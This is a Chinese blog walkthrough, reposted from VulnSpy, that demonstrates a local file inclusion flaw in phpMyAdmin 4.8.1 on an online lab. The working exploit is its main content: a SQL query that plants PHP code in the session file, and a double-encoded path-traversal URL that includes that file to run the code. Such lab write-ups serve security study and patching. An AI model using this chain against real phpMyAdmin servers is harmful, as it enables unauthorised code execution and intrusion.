今天 ChaMd5安全團隊 公開了一個phpMyAdmin最新版中的本地檔案包含漏洞: phpmyadmin4.8.1背景getshell
。該漏洞利用不要求root帳号,隻需能夠登入 phpMyAdmin 便能夠利用。
在這篇文章中我們将使用VulnSpy的
線上 phpMyAdmin 環境來示範該漏洞的利用。
VulnSpy 線上 phpMyAdmin 環境位址:
http://www.vulnspy.com/phpmyadmin-4.8.1/漏洞細節
參照ChaMd5安全團隊釋出的文章:
漏洞利用
因為原文中
包含資料庫檔案
可能由于檔案權限或者帳号權限不足而無法利用,這裡我們将使用另外一種方式來利用該檔案包含漏洞,即包含session檔案。
1. 進入VulnSpy
線上 phpMyAdmin 環境位址,點選 Start to Hack ,跳轉到VSPlate

2. 等待載入設定後,點選 GO 按鈕開啟實驗
3. 實驗建立完成後,點選示範位址進入實驗
4. 使用帳号 root ,密碼 toor 登入 phpMyAdmin
5. 點選頂部導航欄中的
SQL
按鈕,執行SQL查詢
select '<?php phpinfo();exit;?>'
6. 擷取自己的SESSION ID
你的 SESSION ID 為 Cookie 中的
phpMyAdmin
項。
這樣對應的SESSION檔案為
/var/lib/php/sessions/sess_你的SESSION ID
。
7. 包含SESSION檔案,成功利用該漏洞
http://1a23009a9c9e959d9c70932bb9f634eb.vsplate.me/index.php?target=db_sql.php%253f/../../../../../../../../var/lib/php/sessions/sess_11njnj4253qq93vjm9q93nvc7p2lq82k
本文轉載自:phpMyAdmin 4.8.x LFI Exploit -
http://blog.vulnspy.com/2018/06/21/phpMyAdmin-4-8-x-LFI-Exploit/